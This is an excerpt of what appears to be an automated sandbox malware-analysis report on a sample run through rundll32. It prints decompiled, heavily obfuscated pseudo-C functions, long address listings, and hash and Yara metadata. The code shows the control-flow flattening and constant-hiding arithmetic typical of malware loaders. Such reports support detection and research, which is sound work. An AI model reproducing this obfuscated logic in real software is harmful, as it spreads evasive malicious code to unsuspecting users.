				_v104 = _v104 ^ 0xc050dc4c;
				_v104 = _v104 ^ 0x9b058770;
				_v112 = 0xe25509;
				_v112 = _v112 ^ 0xf6d0fdca;
				_v112 = _v112 / _t430;
				_v112 = _v112 ^ 0x02984cdf;
				_v40 = 0xf7137d;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0xf71f8dee;
				_v64 = 0x5508e8;
				_v64 = _v64 << 4;
				_v64 = _v64 | 0x94c676b5;
				_v64 = _v64 ^ 0x95dffb87;
				_v120 = 0xc732ae;
				_t431 = 0x75;
				_v120 = _v120 / _t431;
				_v120 = _v120 << 7;
				_t432 = 0x2c;
				_v120 = _v120 / _t432;
				_v120 = _v120 ^ 0x000601dd;
				_v72 = 0x179b9;
				_v72 = _v72 >> 1;
				_v72 = _v72 << 0xb;
				_v72 = _v72 ^ 0x05ec7a60;
				_v28 = 0x46261b;
				_t433 = 0x35;
				_v28 = _v28 / _t433;
				_v28 = _v28 ^ 0x000e773f;
				_v128 = 0xfd046c;
				_v128 = _v128 << 1;
				_v128 = _v128 << 3;
				_v128 = _v128 + 0xffff42a9;
				_v128 = _v128 ^ 0x0fc89804;
				_v60 = 0xb39cb2;
				_v60 = _v60 + 0xffffa360;
				_v60 = _v60 ^ 0x6e5a7866;
				_v60 = _v60 ^ 0x6eef17c9;
				_v32 = 0xb015d5;
				_t434 = 0x33;
				_v32 = _v32 / _t434;
				_v32 = _v32 ^ 0x00082471;
				_v80 = 0x87b3ae;
				_v80 = _v80 + 0xffffe530;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x021b575c;
				while(_t387 != 0x5e373ec) {
					if(_t387 == 0x87b20b3) {
						_t372 =  *0x6a3dfc; // 0x0
						_t374 = E0068CA90(_v96, _v56, _v104, _v112,  *((intOrPtr*)(_t423 + 4)), _v40, _t387, _v16, _t387,  &_v16, _v64, _v120, _v20, _v72, _v28, _v128, _v60, _v52,  *_t423,  *((intOrPtr*)(_t372 + 0x64)));
						_t437 =  &(_t437[0x12]);
						if(_t374 == _v88) {
							 *_t385 = _v20;
							_t421 = 1;
							 *((intOrPtr*)(_t385 + 4)) = _v16;
						} else {
							_t387 = 0x5e373ec;
							continue;
						}
					} else {
						if(_t387 == 0xc04f77e) {
							_t387 = 0xd382560;
							continue;
						} else {
							if(_t387 == 0xc68a5f7) {
								_push(_t387);
								_push(_t387);
								_t381 = E00687FF2(_v16);
								_v20 = _t381;
								if(_t381 != 0) {
									_t387 = 0x87b20b3;
									continue;
								}
							} else {
								if(_t387 != 0xd382560) {
									L14:
									if(_t387 != 0x4d23f0b) {
										continue;
									} else {
									}
								} else {
									_t382 =  *0x6a3dfc; // 0x0
									_t384 = E0068CA90(_v48, _v92, _v24, _v124,  *((intOrPtr*)(_t423 + 4)), _v76, _t387, _v36, _t387,  &_v16, _v108, _v132, _t421, _v100, _v84, _v140, _v44, _v116,  *_t423,  *((intOrPtr*)(_t382 + 0x64)));
									_t437 =  &(_t437[0x12]);
									if(_t384 == _v148) {
										_t387 = 0xc68a5f7;
										continue;
									}
								}
							}
						}
					}
					return _t421;
				}
				E00698519(_v32, _v80, _v20);
				_t387 = 0x4d23f0b;
				goto L14;
			}





























































                                                                                                                      0x00685e67
                                                                                                                      0x00685e71
                                                                                                                      0x00685e72
                                                                                                                      0x00685e79
                                                                                                                      0x00685e7b
                                                                                                                      0x00685e7c
                                                                                                                      0x00685e7d
                                                                                                                      0x00685e82
                                                                                                                      0x00685e8d
                                                                                                                      0x00685e90
                                                                                                                      0x00685e94
                                                                                                                      0x00685e9b
                                                                                                                      0x00685ea0
                                                                                                                      0x00685ea8
                                                                                                                      0x00685eb6
                                                                                                                      0x00685ebb
                                                                                                                      0x00685ec5
                                                                                                                      0x00685eca
                                                                                                                      0x00685ed0
                                                                                                                      0x00685ed8
                                                                                                                      0x00685ee0
                                                                                                                      0x00685ee5
                                                                                                                      0x00685eea
                                                                                                                      0x00685ef2
                                                                                                                      0x00685efd
                                                                                                                      0x00685f08
                                                                                                                      0x00685f13
                                                                                                                      0x00685f1b
                                                                                                                      0x00685f23
                                                                                                                      0x00685f2b
                                                                                                                      0x00685f33
                                                                                                                      0x00685f3b
                                                                                                                      0x00685f43
                                                                                                                      0x00685f4b
                                                                                                                      0x00685f53
                                                                                                                      0x00685f57
                                                                                                                      0x00685f5f
                                                                                                                      0x00685f67
                                                                                                                      0x00685f70
                                                                                                                      0x00685f73
                                                                                                                      0x00685f77
                                                                                                                      0x00685f7f
                                                                                                                      0x00685f8c
                                                                                                                      0x00685f95
                                                                                                                      0x00685f99
                                                                                                                      0x00685f9e
                                                                                                                      0x00685fa6
                                                                                                                      0x00685fae
                                                                                                                      0x00685fb6
                                                                                                                      0x00685fbe
                                                                                                                      0x00685fc6
                                                                                                                      0x00685fd1
                                                                                                                      0x00685fd9
                                                                                                                      0x00685fe4
                                                                                                                      0x00685fec
                                                                                                                      0x00685ff6
                                                                                                                      0x00685ffa
                                                                                                                      0x00686002
                                                                                                                      0x0068600a
                                                                                                                      0x00686012
                                                                                                                      0x00686017
                                                                                                                      0x0068601c
                                                                                                                      0x00686024
                                                                                                                      0x00686035
                                                                                                                      0x00686038
                                                                                                                      0x0068603c
                                                                                                                      0x00686044
                                                                                                                      0x0068604c
                                                                                                                      0x00686054
                                                                                                                      0x0068605c
                                                                                                                      0x00686064
                                                                                                                      0x00686069
                                                                                                                      0x00686071
                                                                                                                      0x00686079
                                                                                                                      0x00686081
                                                                                                                      0x00686091
                                                                                                                      0x0068609a
                                                                                                                      0x0068609d
                                                                                                                      0x006860a1
                                                                                                                      0x006860a9
                                                                                                                      0x006860b1
                                                                                                                      0x006860b9
                                                                                                                      0x006860be
                                                                                                                      0x006860c6
                                                                                                                      0x006860ce
                                                                                                                      0x006860d6
                                                                                                                      0x006860e2
                                                                                                                      0x006860e6
                                                                                                                      0x006860ee
                                                                                                                      0x006860f6
                                                                                                                      0x006860fe
                                                                                                                      0x00686106
                                                                                                                      0x0068610e
                                                                                                                      0x00686116
                                                                                                                      0x0068611e
                                                                                                                      0x00686126
                                                                                                                      0x0068612e
                                                                                                                      0x00686136
                                                                                                                      0x0068613b
                                                                                                                      0x00686148
                                                                                                                      0x0068614b
                                                                                                                      0x0068614f
                                                                                                                      0x00686157
                                                                                                                      0x00686167
                                                                                                                      0x0068616b
                                                                                                                      0x00686173
                                                                                                                      0x0068617b
                                                                                                                      0x00686183
                                                                                                                      0x00686188
                                                                                                                      0x00686190
                                                                                                                      0x00686194
                                                                                                                      0x0068619c
                                                                                                                      0x006861a9
                                                                                                                      0x006861aa
                                                                                                                      0x006861ae
                                                                                                                      0x006861b6
                                                                                                                      0x006861be
                                                                                                                      0x006861c6
                                                                                                                      0x006861ce
                                                                                                                      0x006861dc
                                                                                                                      0x006861e8
                                                                                                                      0x006861f0
                                                                                                                      0x006861fa
                                                                                                                      0x006861ff
                                                                                                                      0x00686207
                                                                                                                      0x0068620f
                                                                                                                      0x00686214
                                                                                                                      0x0068621c
                                                                                                                      0x00686224
                                                                                                                      0x00686232
                                                                                                                      0x00686237
                                                                                                                      0x0068623d
                                                                                                                      0x00686246
                                                                                                                      0x0068624b
                                                                                                                      0x00686251
                                                                                                                      0x00686259
                                                                                                                      0x00686261
                                                                                                                      0x00686265
                                                                                                                      0x0068626a
                                                                                                                      0x00686272
                                                                                                                      0x00686284
                                                                                                                      0x00686289
                                                                                                                      0x00686292
                                                                                                                      0x0068629d
                                                                                                                      0x006862a5
                                                                                                                      0x006862a9
                                                                                                                      0x006862ae
                                                                                                                      0x006862b6
                                                                                                                      0x006862be
                                                                                                                      0x006862c6
                                                                                                                      0x006862ce
                                                                                                                      0x006862d6
                                                                                                                      0x006862de
                                                                                                                      0x006862f0
                                                                                                                      0x006862f8
                                                                                                                      0x006862ff
                                                                                                                      0x0068630a
                                                                                                                      0x00686312
                                                                                                                      0x0068631a
                                                                                                                      0x0068631f
                                                                                                                      0x00686327
                                                                                                                      0x00686335
                                                                                                                      0x00686418
                                                                                                                      0x0068647f
                                                                                                                      0x00686484
                                                                                                                      0x0068648b
                                                                                                                      0x006864c8
                                                                                                                      0x006864ca
                                                                                                                      0x006864d2
                                                                                                                      0x0068648d
                                                                                                                      0x0068648d
                                                                                                                      0x00000000
                                                                                                                      0x0068648d
                                                                                                                      0x0068633b
                                                                                                                      0x00686341
                                                                                                                      0x0068640e
                                                                                                                      0x00000000
                                                                                                                      0x00686347
                                                                                                                      0x0068634d
                                                                                                                      0x006863ec
                                                                                                                      0x006863ed
                                                                                                                      0x006863ee
                                                                                                                      0x006863f3
                                                                                                                      0x006863fe
                                                                                                                      0x00686404
                                                                                                                      0x00000000
                                                                                                                      0x00686404
                                                                                                                      0x00686353
                                                                                                                      0x00686359
                                                                                                                      0x006864b1
                                                                                                                      0x006864b7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006864bd
                                                                                                                      0x0068635f
                                                                                                                      0x0068635f
                                                                                                                      0x006863bd
                                                                                                                      0x006863c2
                                                                                                                      0x006863c9
                                                                                                                      0x006863cf
                                                                                                                      0x00000000
                                                                                                                      0x006863cf
                                                                                                                      0x006863c9
                                                                                                                      0x00686359
                                                                                                                      0x0068634d
                                                                                                                      0x00686341
                                                                                                                      0x006864e1
                                                                                                                      0x006864e1
                                                                                                                      0x006864a6
                                                                                                                      0x006864ac
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: U$3n$3$TNz7$`%8$`%8$fxZn$~&t$6B
                                                                                                                      • API String ID: 0-1604698900
                                                                                                                      • Opcode ID: 61bafb9737c5d27b091d4b21d34588b9bdb1db9f31531dfa9d6f3872347ca89f
                                                                                                                      • Instruction ID: 93319ba8c4359d017b1af6b2dac07be3f729809a4c96aad7872edf0d284ba75d
                                                                                                                      • Opcode Fuzzy Hash: 61bafb9737c5d27b091d4b21d34588b9bdb1db9f31531dfa9d6f3872347ca89f
                                                                                                                      • Instruction Fuzzy Hash: 84F10F715097409FD368CF66D589A5BBBF2FBC4B48F10891DF29A86260D7B28949CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100453C8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registryclipboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Version$ClipboardFormatRegister
                                                                                                                      • String ID: MSWHEEL_ROLLMSG
                                                                                                                      • API String ID: 2888461884-2485103130
                                                                                                                      • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                      • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                      • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                      • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069CB5B Relevance: 10.3, Strings: 8, Instructions: 335COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 79%
                                                                                                                      			E0069CB5B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				void* _t341;
				void* _t370;
				void* _t379;
				intOrPtr _t382;
				intOrPtr _t385;
				void* _t396;
				intOrPtr _t399;
				intOrPtr _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int* _t449;

				_push(_a12);
				_t436 = 0;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E006920B9(_t341);
				_v1572 = 0xe82680;
				_t449 =  &(( &_v1708)[5]);
				_v1568 = 0;
				_v1564 = 0;
				_t396 = 0x9368da1;
				_v1584 = 0x42403b;
				_v1584 = _v1584 + 0xffffd771;
				_v1584 = _v1584 ^ 0x00421785;
				_v1692 = 0xc00255;
				_t437 = 0x16;
				_v1692 = _v1692 / _t437;
				_v1692 = _v1692 + 0xffff6b87;
				_v1692 = _v1692 + 0xffff176e;
				_v1692 = _v1692 ^ 0x0004c90f;
				_v1668 = 0x5abcaa;
				_v1668 = _v1668 | 0xa6adf3e3;
				_v1668 = _v1668 + 0xffff713c;
				_v1668 = _v1668 << 6;
				_v1668 = _v1668 ^ 0xbfd49dc8;
				_v1700 = 0xb35187;
				_v1700 = _v1700 | 0x50a44dff;
				_v1700 = _v1700 + 0xfffff2e6;
				_v1700 = _v1700 >> 8;
				_v1700 = _v1700 ^ 0x0051b9c1;
				_v1644 = 0x4d7cc3;
				_v1644 = _v1644 + 0xffffa786;
				_v1644 = _v1644 | 0x8b8a715e;
				_v1644 = _v1644 ^ 0x6234f021;
				_v1644 = _v1644 ^ 0xe9f998a6;
				_v1624 = 0x204c5b;
				_v1624 = _v1624 + 0xffffa901;
				_v1624 = _v1624 + 0x49e1;
				_v1624 = _v1624 ^ 0x002fe6aa;
				_v1632 = 0xbb0a9b;
				_v1632 = _v1632 * 0x52;
				_v1632 = _v1632 | 0x83893080;
				_v1632 = _v1632 ^ 0xbbe905c0;
				_v1620 = 0x19fb1a;
				_v1620 = _v1620 | 0x985eae3d;
				_v1620 = _v1620 + 0xf613;
				_v1620 = _v1620 ^ 0x9864c971;
				_v1656 = 0x35ecb4;
				_v1656 = _v1656 * 0x29;
				_v1656 = _v1656 + 0x1081;
				_v1656 = _v1656 + 0xffffd324;
				_v1656 = _v1656 ^ 0x08a8fe56;
				_v1580 = 0xc60f6f;
				_v1580 = _v1580 + 0xffffd3e6;
				_v1580 = _v1580 ^ 0x00c233ea;
				_v1664 = 0x2df5c;
				_v1664 = _v1664 << 8;
				_v1664 = _v1664 * 0x4c;
				_v1664 = _v1664 + 0xffffaed7;
				_v1664 = _v1664 ^ 0xda40187b;
				_v1672 = 0x38409b;
				_v1672 = _v1672 * 0x33;
				_v1672 = _v1672 | 0x7fcdffbb;
				_v1672 = _v1672 ^ 0x7ff87770;
				_v1680 = 0xe751cb;
				_v1680 = _v1680 ^ 0x8590ed7d;
				_v1680 = _v1680 + 0xffffebc9;
				_v1680 = _v1680 * 0x5e;
				_v1680 = _v1680 ^ 0x01e2719c;
				_v1688 = 0x15e1cd;
				_v1688 = _v1688 + 0xfe19;
				_v1688 = _v1688 + 0xffffc88c;
				_v1688 = _v1688 << 7;
				_v1688 = _v1688 ^ 0x0b5f3deb;
				_v1696 = 0x33a377;
				_v1696 = _v1696 << 0xa;
				_v1696 = _v1696 ^ 0xfb2d04b5;
				_v1696 = _v1696 | 0xd2f07883;
				_v1696 = _v1696 ^ 0xf7fa7ce3;
				_v1640 = 0x94004d;
				_v1640 = _v1640 >> 0xa;
				_t438 = 0x67;
				_v1640 = _v1640 * 0x3d;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x00039ca1;
				_v1648 = 0xfcfef3;
				_v1648 = _v1648 * 0x18;
				_v1648 = _v1648 + 0x9c71;
				_v1648 = _v1648 | 0xf5d6202a;
				_v1648 = _v1648 ^ 0xf7f57601;
				_v1596 = 0xc58f80;
				_v1596 = _v1596 + 0xffff2f17;
				_v1596 = _v1596 ^ 0x00ce700d;
				_v1684 = 0xee980b;
				_v1684 = _v1684 >> 6;
				_v1684 = _v1684 / _t438;
				_v1684 = _v1684 + 0xffff2a3f;
				_v1684 = _v1684 ^ 0xfff3655c;
				_v1652 = 0x45a4a9;
				_v1652 = _v1652 >> 0xe;
				_t439 = 0x6e;
				_v1652 = _v1652 * 0x51;
				_v1652 = _v1652 + 0x9be3;
				_v1652 = _v1652 ^ 0x0004d4d8;
				_v1708 = 0x222243;
				_t176 =  &_v1708; // 0x222243
				_v1708 =  *_t176 / _t439;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 + 0xffff4a12;
				_v1708 = _v1708 ^ 0x009b5339;
				_v1612 = 0x464ea3;
				_v1612 = _v1612 + 0x89cc;
				_v1612 = _v1612 >> 2;
				_v1612 = _v1612 ^ 0x00167067;
				_v1588 = 0xd74d9e;
				_v1588 = _v1588 | 0x529da741;
				_v1588 = _v1588 ^ 0x52d09c78;
				_v1628 = 0x60b5eb;
				_v1628 = _v1628 >> 9;
				_t440 = 0x19;
				_v1628 = _v1628 / _t440;
				_v1628 = _v1628 ^ 0x000ff1bc;
				_v1676 = 0xfb7b01;
				_v1676 = _v1676 << 4;
				_v1676 = _v1676 + 0xffffc28e;
				_t441 = 0x1b;
				_v1676 = _v1676 / _t441;
				_v1676 = _v1676 ^ 0x0096cb21;
				_v1660 = 0xed67c1;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 | 0xef7d69c8;
				_v1660 = _v1660 << 2;
				_v1660 = _v1660 ^ 0xfff42fe1;
				_v1604 = 0x46c7e8;
				_v1604 = _v1604 << 0xf;
				_v1604 = _v1604 ^ 0x63fe3710;
				_v1636 = 0x7a345b;
				_v1636 = _v1636 + 0xd479;
				_v1636 = _v1636 + 0x8c7f;
				_v1636 = _v1636 ^ 0x00708a00;
				_v1704 = 0x80508e;
				_v1704 = _v1704 ^ 0xf958081f;
				_t442 = 0x4b;
				_v1704 = _v1704 / _t442;
				_t443 = 0x34;
				_v1704 = _v1704 * 0x44;
				_v1704 = _v1704 ^ 0xe2885afb;
				_v1576 = 0x325f4f;
				_t259 =  &_v1576; // 0x325f4f
				_v1576 =  *_t259 * 0x7a;
				_v1576 = _v1576 ^ 0x180920ed;
				_v1592 = 0xd554f9;
				_v1592 = _v1592 * 0x4e;
				_v1592 = _v1592 ^ 0x40f8e8dd;
				_v1608 = 0x6be570;
				_v1608 = _v1608 + 0x3d4f;
				_v1608 = _v1608 ^ 0x4461575c;
				_v1608 = _v1608 ^ 0x440eeedf;
				_v1616 = 0x4acfbf;
				_v1616 = _v1616 / _t443;
				_t444 = 0xe;
				_v1616 = _v1616 / _t444;
				_v1616 = _v1616 ^ 0x000fdd65;
				_v1600 = 0x55de88;
				_v1600 = _v1600 << 2;
				_v1600 = _v1600 ^ 0x01580110;
				do {
					while(_t396 != 0x196a97b) {
						if(_t396 == 0x2ca432c) {
							_push(_v1652);
							_push(_v1684);
							_t379 = E0069DCF7(_v1596, 0x6810f0, __eflags);
							E0069176B( &_v1560, __eflags);
							_t382 =  *0x6a3e10; // 0x0
							_t385 =  *0x6a3e10; // 0x0
							E0069E32E(_v1612, __eflags, _t379, _v1588,  &_v1040, _v1628, _t385 + 0x23c, _v1676,  &_v520, _v1660, _v1604, _v1636, _t436, _t382 + 0x1c,  &_v1560);
							E0068A8B0(_v1704, _t379, _v1576);
							_t449 =  &(_t449[0xf]);
							_t396 = 0x9d0e956;
							continue;
						} else {
							if(_t396 == 0x9368da1) {
								_push(_v1644);
								_push(_v1584);
								_push(_v1700);
								_push( &_v1040);
								E006946BB(_v1692, _v1668);
								_t449 = _t449 - 0xc + 0x1c;
								_t396 = 0x196a97b;
								continue;
							} else {
								_t456 = _t396 - 0x9d0e956;
								if(_t396 != 0x9d0e956) {
									goto L10;
								} else {
									_push(_v1600);
									_push(_t436);
									_push(_t396);
									_push(_t436);
									_push(_t436);
									_push(_v1616);
									_push( &_v520);
									E0068AB87(_v1592, _v1608, _t456);
									_t436 =  !=  ? 1 : _t436;
								}
							}
						}
						L6:
						return _t436;
					}
					_push(_v1620);
					_push(_v1632);
					_t370 = E0069DCF7(_v1624, 0x681020, __eflags);
					E0069176B( &_v1560, __eflags);
					_t399 =  *0x6a3e10; // 0x0
					_t336 = _t399 + 0x1c; // 0x1c
					_t337 = _t399 + 0x23c; // 0x23c
					E00691652(_v1580, __eflags, _t337, _t336, _v1664, _v1672, _t370, 0x104,  &_v520, _v1680,  &_v1040, _v1688,  &_v1560, _v1696);
					E0068A8B0(_v1640, _t370, _v1648);
					_t449 =  &(_t449[0xf]);
					_t396 = 0x9d0e956;
					L10:
					__eflags = _t396 - 0xce3b296;
				} while (__eflags != 0);
				goto L6;
			}




























































                                                                                                                      0x0069cb65
                                                                                                                      0x0069cb6c
                                                                                                                      0x0069cb6e
                                                                                                                      0x0069cb75
                                                                                                                      0x0069cb7c
                                                                                                                      0x0069cb7d
                                                                                                                      0x0069cb7e
                                                                                                                      0x0069cb83
                                                                                                                      0x0069cb8e
                                                                                                                      0x0069cb91
                                                                                                                      0x0069cb9a
                                                                                                                      0x0069cba1
                                                                                                                      0x0069cba6
                                                                                                                      0x0069cbb1
                                                                                                                      0x0069cbbc
                                                                                                                      0x0069cbc7
                                                                                                                      0x0069cbd5
                                                                                                                      0x0069cbd8
                                                                                                                      0x0069cbdc
                                                                                                                      0x0069cbe4
                                                                                                                      0x0069cbec
                                                                                                                      0x0069cbf4
                                                                                                                      0x0069cbfc
                                                                                                                      0x0069cc04
                                                                                                                      0x0069cc0c
                                                                                                                      0x0069cc11
                                                                                                                      0x0069cc19
                                                                                                                      0x0069cc21
                                                                                                                      0x0069cc29
                                                                                                                      0x0069cc31
                                                                                                                      0x0069cc36
                                                                                                                      0x0069cc3e
                                                                                                                      0x0069cc46
                                                                                                                      0x0069cc4e
                                                                                                                      0x0069cc56
                                                                                                                      0x0069cc5e
                                                                                                                      0x0069cc66
                                                                                                                      0x0069cc6e
                                                                                                                      0x0069cc76
                                                                                                                      0x0069cc7e
                                                                                                                      0x0069cc86
                                                                                                                      0x0069cc93
                                                                                                                      0x0069cc97
                                                                                                                      0x0069cc9f
                                                                                                                      0x0069cca7
                                                                                                                      0x0069ccaf
                                                                                                                      0x0069ccb7
                                                                                                                      0x0069ccbf
                                                                                                                      0x0069ccc7
                                                                                                                      0x0069ccd4
                                                                                                                      0x0069ccd8
                                                                                                                      0x0069cce0
                                                                                                                      0x0069cce8
                                                                                                                      0x0069ccf0
                                                                                                                      0x0069ccfb
                                                                                                                      0x0069cd06
                                                                                                                      0x0069cd11
                                                                                                                      0x0069cd19
                                                                                                                      0x0069cd23
                                                                                                                      0x0069cd27
                                                                                                                      0x0069cd2f
                                                                                                                      0x0069cd37
                                                                                                                      0x0069cd44
                                                                                                                      0x0069cd48
                                                                                                                      0x0069cd50
                                                                                                                      0x0069cd58
                                                                                                                      0x0069cd60
                                                                                                                      0x0069cd68
                                                                                                                      0x0069cd75
                                                                                                                      0x0069cd7b
                                                                                                                      0x0069cd83
                                                                                                                      0x0069cd8b
                                                                                                                      0x0069cd93
                                                                                                                      0x0069cd9b
                                                                                                                      0x0069cda0
                                                                                                                      0x0069cda8
                                                                                                                      0x0069cdb0
                                                                                                                      0x0069cdb5
                                                                                                                      0x0069cdbd
                                                                                                                      0x0069cdc5
                                                                                                                      0x0069cdcd
                                                                                                                      0x0069cdd5
                                                                                                                      0x0069cde1
                                                                                                                      0x0069cde4
                                                                                                                      0x0069cde8
                                                                                                                      0x0069cded
                                                                                                                      0x0069cdf5
                                                                                                                      0x0069ce02
                                                                                                                      0x0069ce06
                                                                                                                      0x0069ce0e
                                                                                                                      0x0069ce16
                                                                                                                      0x0069ce1e
                                                                                                                      0x0069ce29
                                                                                                                      0x0069ce34
                                                                                                                      0x0069ce3f
                                                                                                                      0x0069ce47
                                                                                                                      0x0069ce54
                                                                                                                      0x0069ce58
                                                                                                                      0x0069ce60
                                                                                                                      0x0069ce68
                                                                                                                      0x0069ce70
                                                                                                                      0x0069ce7a
                                                                                                                      0x0069ce7d
                                                                                                                      0x0069ce81
                                                                                                                      0x0069ce89
                                                                                                                      0x0069ce91
                                                                                                                      0x0069ce99
                                                                                                                      0x0069cea1
                                                                                                                      0x0069cea5
                                                                                                                      0x0069ceaa
                                                                                                                      0x0069ceb2
                                                                                                                      0x0069ceba
                                                                                                                      0x0069cec2
                                                                                                                      0x0069ceca
                                                                                                                      0x0069cecf
                                                                                                                      0x0069ced7
                                                                                                                      0x0069cee2
                                                                                                                      0x0069ceed
                                                                                                                      0x0069cef8
                                                                                                                      0x0069cf00
                                                                                                                      0x0069cf09
                                                                                                                      0x0069cf0e
                                                                                                                      0x0069cf14
                                                                                                                      0x0069cf1c
                                                                                                                      0x0069cf24
                                                                                                                      0x0069cf29
                                                                                                                      0x0069cf35
                                                                                                                      0x0069cf38
                                                                                                                      0x0069cf3c
                                                                                                                      0x0069cf44
                                                                                                                      0x0069cf4c
                                                                                                                      0x0069cf51
                                                                                                                      0x0069cf5b
                                                                                                                      0x0069cf65
                                                                                                                      0x0069cf72
                                                                                                                      0x0069cf7a
                                                                                                                      0x0069cf7f
                                                                                                                      0x0069cf87
                                                                                                                      0x0069cf8f
                                                                                                                      0x0069cf97
                                                                                                                      0x0069cf9f
                                                                                                                      0x0069cfa7
                                                                                                                      0x0069cfaf
                                                                                                                      0x0069cfbd
                                                                                                                      0x0069cfc2
                                                                                                                      0x0069cfcd
                                                                                                                      0x0069cfd0
                                                                                                                      0x0069cfd4
                                                                                                                      0x0069cfdc
                                                                                                                      0x0069cfe7
                                                                                                                      0x0069cfef
                                                                                                                      0x0069cff6
                                                                                                                      0x0069d001
                                                                                                                      0x0069d014
                                                                                                                      0x0069d01b
                                                                                                                      0x0069d026
                                                                                                                      0x0069d02e
                                                                                                                      0x0069d036
                                                                                                                      0x0069d03e
                                                                                                                      0x0069d046
                                                                                                                      0x0069d056
                                                                                                                      0x0069d05e
                                                                                                                      0x0069d061
                                                                                                                      0x0069d065
                                                                                                                      0x0069d06d
                                                                                                                      0x0069d075
                                                                                                                      0x0069d07a
                                                                                                                      0x0069d082
                                                                                                                      0x0069d082
                                                                                                                      0x0069d090
                                                                                                                      0x0069d119
                                                                                                                      0x0069d122
                                                                                                                      0x0069d12d
                                                                                                                      0x0069d13b
                                                                                                                      0x0069d149
                                                                                                                      0x0069d16e
                                                                                                                      0x0069d19b
                                                                                                                      0x0069d1ad
                                                                                                                      0x0069d1b2
                                                                                                                      0x0069d1b5
                                                                                                                      0x00000000
                                                                                                                      0x0069d096
                                                                                                                      0x0069d09c
                                                                                                                      0x0069d0e8
                                                                                                                      0x0069d0f3
                                                                                                                      0x0069d0fa
                                                                                                                      0x0069d109
                                                                                                                      0x0069d10a
                                                                                                                      0x0069d10f
                                                                                                                      0x0069d112
                                                                                                                      0x00000000
                                                                                                                      0x0069d09e
                                                                                                                      0x0069d09e
                                                                                                                      0x0069d0a0
                                                                                                                      0x00000000
                                                                                                                      0x0069d0a6
                                                                                                                      0x0069d0a6
                                                                                                                      0x0069d0b1
                                                                                                                      0x0069d0b2
                                                                                                                      0x0069d0b3
                                                                                                                      0x0069d0b4
                                                                                                                      0x0069d0b5
                                                                                                                      0x0069d0ca
                                                                                                                      0x0069d0cb
                                                                                                                      0x0069d0d8
                                                                                                                      0x0069d0d8
                                                                                                                      0x0069d0a0
                                                                                                                      0x0069d09c
                                                                                                                      0x0069d0db
                                                                                                                      0x0069d0e7
                                                                                                                      0x0069d0e7
                                                                                                                      0x0069d1bc
                                                                                                                      0x0069d1c5
                                                                                                                      0x0069d1cd
                                                                                                                      0x0069d1db
                                                                                                                      0x0069d212
                                                                                                                      0x0069d21f
                                                                                                                      0x0069d223
                                                                                                                      0x0069d22e
                                                                                                                      0x0069d243
                                                                                                                      0x0069d248
                                                                                                                      0x0069d24b
                                                                                                                      0x0069d24d
                                                                                                                      0x0069d24d
